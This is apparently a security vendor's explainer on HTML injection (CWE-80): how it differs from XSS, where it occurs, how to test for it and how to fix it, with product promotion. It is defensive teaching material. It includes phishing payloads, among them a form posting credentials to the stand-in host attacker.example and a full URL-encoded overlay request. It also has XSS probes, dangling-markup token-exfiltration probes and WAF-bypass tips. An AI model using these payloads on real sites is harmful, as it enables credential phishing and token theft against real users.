Vulnerability

HTML Injection
detect, understand, remediate

HTML injection (CWE-80) is any condition where an application reflects attacker-controlled markup into the rendered HTML of a page without first encoding it for the HTML context. The vulnerability sits next to but distinct from XSS: HTML injection covers the markup-injection root, XSS adds JavaScript execution. When a WAF blocks script tags but lets iframes, anchors, or styles through, the result is in-domain phishing, brand defacement, dangling-markup data exfiltration, and the conditions for chaining into clickjacking or open-redirect attacks.

No credit card required. Free plan available forever.

Severity

Medium

CWE ID

CWE-80

OWASP Top 10

A03:2021 - Injection

CVSS 3.1 Score

6.1

What is HTML injection?

HTML injection (CWE-80 Improper Neutralization of Script-Related HTML Tags in a Web Page, sometimes referred to as Basic XSS) is any condition where an application reflects attacker-controlled markup into the rendered HTML of a page without first encoding it for the HTML context. The injected fragment becomes part of the document tree the browser parses. The attacker does not need JavaScript to execute. The damage comes from new structural elements appearing inside the page: a fake login form rendered above the real content, a misleading CSS-styled banner that overlays the navigation, a hyperlink that points away from the legitimate domain, an image that pulls a tracking pixel, or a malformed tag that swallows the rest of the document until a closing brace.

The vulnerability sits inside OWASP A03:2021 Injection, next to but distinct from cross-site scripting (CWE-79), which adds JavaScript execution to the same root cause. The line between the two is filter-dependent. A page that filters <script> tags but accepts an <iframe> or an <a href> is still HTML injection; with a single bypass it becomes XSS. Many engagements report the finding as XSS because the script-execution payload lands first; the underlying class is HTML injection and the fix has to address the markup-injection problem at the root, not the specific JavaScript payload that exploited it.

Treat HTML injection as a standalone finding when the injection point allows new tags or attributes but the application's output context, encoding layer, or downstream Content Security Policy stops script execution. The leftover damage is real: phishing overlays inside the legitimate domain, brand defacement, link redirection, dangling-markup data exfiltration, and the conditions for chaining into clickjacking or open-redirect attacks. A finding that says "<script> is filtered, so this is informational" misses the threat model.

HTML injection vs XSS: where the line sits

The two findings get confused, conflated, and reported under the wrong CWE on most engagements. The table below names the practical distinctions a tester should walk before deciding which class a finding belongs to.

PropertyHTML injection (CWE-80)XSS (CWE-79)
Required capabilityNew HTML tags, attributes, or markup structure render in the response without encoding.Same root cause, plus a path to JavaScript execution: a <script> tag, an event-handler attribute, a javascript: URI, or an HTML sink that triggers a JavaScript context.
Typical payloads<h1>, <iframe src>, <a href>, <img src>, <form action>, <link rel="stylesheet">, <style>, dangling <textarea>.<script>alert(1)</script>, <img src=x onerror=alert(1)>, <a href="javascript:alert(1)">, <svg onload>.
Realistic impactIn-page phishing overlay, defacement, link redirection, dangling-markup exfiltration of CSRF tokens, conditional layout breakage that hides safety controls.All of the HTML-injection impacts plus session theft, keylogging, account takeover, and arbitrary action execution as the victim.
Why the line gets blurredA WAF or filter blocks <script> but lets <iframe> or onmouseover= through. The encoding gap is the same; only the payload class changes.A successful XSS proof is also a proof of HTML injection. The reverse is not true.
Severity ceilingUsually Medium when CSP and other downstream controls block script execution, with an inline social-engineering or phishing impact.High to Critical depending on session scope, stored vs reflected, and whether MFA-bound actions can be triggered.
Fix surfaceContext-aware HTML encoding at output, allowlist-based markup if rich content is required, plus a strict Content Security Policy as defence in depth.Same fixes plus removing every script-injection sink (innerHTML, document.write, dangerouslySetInnerHTML, eval, javascript: URI handling).

Where HTML injection shows up on real engagements

The injection sinks are the same as XSS: any place the application reflects user input into the response. The difference is what each sink is filtered for. The list below pairs the common sink with the realistic injected payload that lands when JavaScript execution is blocked.

SinkRealistic injected payloadPractical impact
URL parameter reflected in bodyAn <h1> or styled <div> that renders a fake banner urging the user to enter credentials at a different URL.In-domain phishing that bypasses url-bar checks because the page really is on the legitimate origin.
Search results page header<a href="https://attacker.example/sso">Click to verify your account</a> embedded above the result list.Visitor redirection, tracking, and credential-collection campaigns that look indistinguishable from a real callout.
User profile or comment fields<iframe src="https://attacker.example/spoof" width=600 height=400 style="border:0"> stored on a public profile page.Persistent in-domain phishing for every viewer of the affected page; brand defacement at scale.
Email name or display field<style>body{display:none}</style> or a malformed tag that swallows the page until a closing brace appears further down the document.Dangling-markup exfiltration of CSRF tokens, layout breakage that hides safety controls, denial of legitimate UX.
Error page that reflects the requestA <form action="https://attacker.example/login" method="post"> block injected before the legitimate page form.Login-form override: the user submits credentials to the attacker because the injected form sits earlier in the DOM.
PDF, invoice, or report templatesMarkup smuggled through a name field renders inside server-generated documents that quote the same string.Trust-document defacement, in-document phishing for downstream readers, document-renderer SSRF in some cases.
Email templates that quote user inputAn <a href> or a styled banner injected through a transactional email field that the email renderer accepts.The phishing payload arrives from the legitimate sender domain, which most email defences trust by default.
Status pages and admin noticesAn admin-only HTML field that renders without encoding, exploited through a privilege chain or a CSRF.Legitimate-looking system message that targets every authenticated user (a maintenance window with a fake reset link).

Why HTML injection really happens

The pattern is rarely a single missing call. It is a layered failure where a development team installs a script-blocker, declares the XSS class fixed, and never closes the markup-injection root. The next refactor adds a new sink, the filter does not match it, and the same input hits the document tree under a different tag.

Blocklist filters that target script tags only

A regex that strips <script> and javascript: leaves every other tag untouched. <iframe>, <a href>, <img src>, <form>, <style>, <link> all render unchanged. The fix is allowlist-based: encode every character that could close, open, or modify a tag, and only restore specific markup through a vetted sanitiser.

String concatenation into HTML output

Building HTML through "<div>" + userInput + "</div>" without a templating engine that auto-encodes is the most common single cause. The fix is to render through a context-aware template (React, Vue, Svelte, Jinja with autoescape) and to make it a code-review rule that no string concatenation produces HTML.

Encoding applied at the wrong context

URL-encoding or JavaScript-escaping a value that lands in HTML body context still leaves angle brackets intact. The encoding has to match the context the value renders into: HTML body, HTML attribute, JavaScript string, CSS value, or URL. A library that exposes only one "escape" function is a footgun.

Markdown or rich-text engines without an allowlist

Markdown renderers happily pass through raw HTML by default. A Markdown field that accepts <iframe> or <form> is HTML injection by design. The fix is to disable raw-HTML pass-through and to allowlist a small set of markup tags inside the renderer.

Server-side template injection sinks

A second-order sink where user input is interpolated into a template at render time. The application encodes the value at the API tier and then re-renders it server-side without re-encoding. The fix is to encode at the final HTML render boundary, not before.

Reliance on CSP without root-cause fix

A strict Content Security Policy is the right defence in depth, but it is not a substitute for output encoding. The HTML-injection class still allows phishing overlays, link redirection, and dangling-markup exfiltration even when CSP blocks every inline script. The fix is to encode at output and to keep CSP as a second wall.

A worked example: in-domain phishing through HTML injection

A common shape on engagements is a search results page that reflects the query into a header banner. The application is deployed behind a WAF that strips <script> tags, blocks javascript: URIs, and rejects on event-handler attributes. The team has run an automated scanner, seen no XSS hits, and signed off on the page. The pentester probes with a payload that uses no script and no event handlers.

# Vulnerable behaviour

GET /search?q=portal HTTP/1.1
Host: target.example

<!-- response body, abridged -->
<h1>Results for portal</h1>
<ul>...</ul>

# Pentester probe

GET /search?q=%3Cdiv+style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bbackground%3A%23fff%3Bz-index%3A9999%22%3EYour+session+expired.+Sign+in+at+%3Ca+href%3D%22https%3A%2F%2Fattacker.example%2Fsignin%22%3Etarget.example%2Fsignin%3C%2Fa%3E%3C%2Fdiv%3E HTTP/1.1
Host: target.example

# Decoded payload (rendered into the page)
<div style="position:fixed;top:0;left:0;width:100%;background:#fff;z-index:9999">
  Your session expired. Sign in at
  <a href="https://attacker.example/signin">target.example/signin</a>
</div>

# Result
The legitimate page renders normally. Above it sits a full-width white banner telling
the user that their session has expired, with a link that visually reads target.example
but resolves to attacker.example. Every visitor who follows the crafted URL sees the
overlay rendered inside the trusted origin, with a valid TLS certificate and the real
site chrome behind it. No script ever runs. CSP does not block any of this.

The pentester captures the request, the response, and a screenshot of the rendered overlay. The proof artefact is the in-domain screenshot, because that is what closes the question "is this informational or exploitable" for the client. The conversion path to harm is direct: the attacker emails or messages the crafted URL to a target user, the target sees the overlay inside the legitimate domain, and the captured credentials get reused on the real login form.

The fix is structural. The search header has to render through a context-aware encoder so the angle brackets become &lt; and &gt; in HTML body context. The Content Security Policy gets tightened to disallow inline styles, which removes the overlay vector even if a future regression breaks the encoder. A regression test asserts that the response for a payload containing markup characters renders the encoded form, not the raw form. On a SecPortal engagement, the proof artefacts (request, response, screenshot, payload, decoded payload, before-and-after screenshots after the fix lands) stay attached to the finding record through retest, so the close-out conversation references the patched encoder rather than a vague "it doesn't reproduce now" ticket.

How to detect HTML injection

Automated detection

  • SecPortal's authenticated scanner probes every reflected and stored input field with a graduated payload set: angle brackets, an attribute-context probe, a tag-context probe, an iframe probe, a form probe, and a dangling-markup probe. Findings are reported when the response body renders the unescaped probe characters in any HTML-affecting context.
  • The same scanner classifies hits by the highest-impact payload that landed: dangling markup at the top, then iframe and form, then anchor and image, then style and inline-CSS. The classification drives the CVSS calibration so the severity matches the realistic impact rather than the mere presence of an angle bracket in the response.
  • The external scanner flags the unauthenticated cases (search pages, error pages, tracking-parameter reflections, public profile pages) without needing credentials. Authentication-gated sinks need the authenticated module.
  • Findings ship with the captured request, the unescaped response substring, the highest-impact payload class, and a reproducer command. The reproducer is what engineering needs to verify the fix at retest; the screenshot is what the business stakeholder needs to understand the impact.

Manual testing

  • Inventory every input that reaches the rendered HTML: query parameters, POST body fields, cookie values that appear on a debug page, JSON fields rendered server-side, headers reflected by error handlers, and document fields rendered into PDF or email templates.
  • Probe each input with a graduated payload sequence. Start with literal angle brackets, then a benign new tag like <b>, then an attribute-context probe like " autofocus, then a structural tag like <iframe src="//example.test">, then a dangling-markup probe like <img src=". Each step that lands without encoding is a finding.
  • Verify the rendered output, not just the response body. A response that contains <iframe> encoded as text in a JSON field but rendered as raw HTML in a downstream view is still HTML injection at the rendered tier. Browser dev tools, view-source, and a copy of the rendered DOM are the truth source.
  • Test the bypass paths around the WAF. A payload that uses Unicode lookalikes, extra whitespace, mixed case in tag names, or a leading null byte often slips a regex-based filter. The fix is encoding, not blocking; a tester should still demonstrate the bypass to make the case for fixing the root cause.
  • Test the second-order sinks. A name field that is encoded at the API tier may be re-rendered into a server-generated PDF, an email template, or a client-portal admin view that re-evaluates the markup. A second-order injection often has higher business impact than the first-order reflection.
  • Test the dangling-markup vectors. A trailing <img src=" that swallows the rest of the document until a closing quote appears can exfiltrate CSRF tokens or session metadata to an attacker-controlled URL through the image fetch. CSP without strict img-src is not a defence.

How to fix HTML injection

Encode at output, in the right context

Use a context-aware HTML encoder for HTML body context (replace &, <, >, ", and ' with their named or numeric entities), an attribute-context encoder for HTML attribute context, and a JavaScript-string encoder for inline JavaScript. The library should be one with separate functions per context, not a single "escape" call. Modern templating engines (React JSX, Vue, Svelte, Jinja with autoescape, Razor) handle the body context correctly by default; verify the attribute context separately for any field that renders into one.

Render rich content through an allowlist sanitiser

When the field has to accept formatting (a comment with bold text, a description with bullet lists), use an allowlist-based sanitiser like DOMPurify in the browser or sanitize-html on the server. Allowlist a small set of tags and attributes; never use a denylist. The sanitiser configuration is a security boundary and belongs in code review.

Disable raw HTML pass-through in Markdown engines

Most Markdown renderers (markdown-it, marked, remark) accept raw HTML by default. Set the option that strips it (markdown-it: html: false, marked: sanitizer or postprocess, remark: rehype-sanitize) and add a regression test that asserts a Markdown payload containing <iframe> renders as escaped text.

Enforce a strict Content Security Policy as defence in depth

A CSP that disallows inline scripts, inline styles, and unsafe-eval limits the damage from a future regression. It does not replace output encoding. The CSP should also restrict img-src and connect-src to prevent dangling-markup exfiltration through pixel tracking. Read the implementation guide on the missing security headers page for the specific directives.

Encode user input that reaches PDF, email, and document templates

The same fix has to land at every render tier. A name field encoded in the web view but interpolated raw into a PDF template is still vulnerable. Document renderers, email templates, invoice generators, and report exporters all need their own encoding boundaries.

Treat the WAF as a backstop, not a fix

WAF rules that strip script tags create a false sense of safety. The HTML-injection class is wider than the script-execution class. Fix the encoding, then keep the WAF for the unknown-unknown class of payloads. A finding should reference the WAF rule and the encoding fix together.

Add a regression test on the encoding boundary

A small test that asserts a payload with angle brackets and quotes renders as the encoded equivalent prevents the bug from regressing during a refactor. The test belongs near the template, not in a unit test of the validation layer; the bug lives at output, so the test should live there.

Audit the second-order sinks together with the primary input

Every place the same field is rendered should be in the change set. An identifier that is encoded on the public web view but interpolated raw into the admin console, a search index, an export job, or a downstream service has not been fixed.

Severity calibration

HTML injection findings get disputed in two predictable ways. Engineering pushes back that the discrepancy is "informational because the script blocker stopped XSS", which conflates the script-execution class with the markup-injection class. The CISO pushes back that the report should not flag a marketing page that reflects the URL into a heading, which over-corrects against legitimate findings on form-rendering pages. Both miss the calibration point. CVSS 3.1 for a confirmed HTML-injection finding with a reproducible in-domain phishing path typically lands at AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (6.1 base, Medium), and the score moves up when the sink is stored, when the affected page is authenticated, or when dangling markup can exfiltrate CSRF tokens.

The strongest reports name the payload class that landed (anchor, iframe, form, style, dangling markup), the affected sink, the rendered evidence (a screenshot of the in-domain overlay or the modified DOM), the realistic downstream impact for the specific application (in-domain phishing of session-bound users, defacement on a public profile, link redirection of a high-traffic search page), and the CVSS vector calibrated to the proven path. The severity calibration research covers the case-by-case decision-making that separates a real Medium from an inflated High and from a dismissed Low.

Reporting an HTML injection finding

On a SecPortal engagement, the finding sits on the engagement record with the affected sink, the rendered payload class, the captured request and response, the screenshot of the rendered output, the CVSS 3.1 vector calibrated to the realistic downstream chain, the CWE-80 mapping (with CWE-79 cross-reference if a script-execution path was demonstrated alongside it), and the remediation guidance from this page. The proof artefacts stay attached through retest, so the close-out conversation references the patched encoding boundary rather than a generic "can't reproduce now" note.

The finding triage workflow covers how to separate scanner-derived flags (an angle-bracket reflection in a JSON field) from manually validated findings (a captured screenshot of an in-domain overlay), so the report differentiates rule hits from confirmed exploits. The pentest report writing guide covers how to phrase the business impact for a reader who needs to understand why an HTML-injection finding matters when no script ran. And the retesting workflow covers the verification steps for a fix that has to land at multiple render tiers.

Compliance impact

A pentester checklist for HTML injection

The list below is the minimum coverage a tester should walk before declaring a target's rendered HTML free of injection. Each item maps to a specific sink class and a specific payload context.

  • Reflected query parameters: probe with angle brackets, with a benign new tag, with an attribute-context probe, and with a structural tag (iframe, form, anchor). Verify the rendered DOM for each, not just the response body.
  • Stored fields: profile names, comment fields, document titles, file names, project descriptions, support ticket subjects. Inject through one user account and view through another to confirm persistence.
  • Markdown and rich-text editors: probe whether raw HTML pass-through is enabled. Assert that <iframe> and <form> render as escaped text, not as new elements.
  • Header reflection: error pages that quote the user-agent, the host header, or the X-Forwarded-For value. The same input that injects on a marketing page often injects on the error page.
  • Second-order sinks: PDF templates, email renderers, invoice generators, report exporters, admin console views. The same name or description field can render encoded in one tier and raw in another.
  • Dangling markup: probe with a trailing <img src=" or a trailing <style> that swallows downstream content. Confirm whether CSRF tokens, session metadata, or user PII appears in the eventual fetched URL or rendered exfiltration channel.
  • Bypass paths around the WAF: Unicode lookalikes, extra whitespace, mixed case, leading null bytes, fragmented requests. A payload that lands through a bypass is still a vulnerability; demonstrate it to make the encoding-fix case stronger.
  • Record the payload class that landed (anchor, iframe, form, style, dangling markup), the affected sink, the rendered evidence (screenshot of the in-domain overlay or modified DOM), the CVSS vector calibrated to the realistic downstream chain, the CWE-80 mapping (and CWE-79 cross-reference where a script-execution path was demonstrated), and the remediation plan covering output encoding, sanitiser allowlist, CSP tightening, and a regression test.

Catch markup-injection sinks before the phishing overlay lands

SecPortal's authenticated scanner probes reflected and stored sinks with a graduated payload set, classifies hits by the highest-impact payload that landed, and ships findings with captured screenshots and reproducer commands. Start free.

No credit card required. Free plan available forever.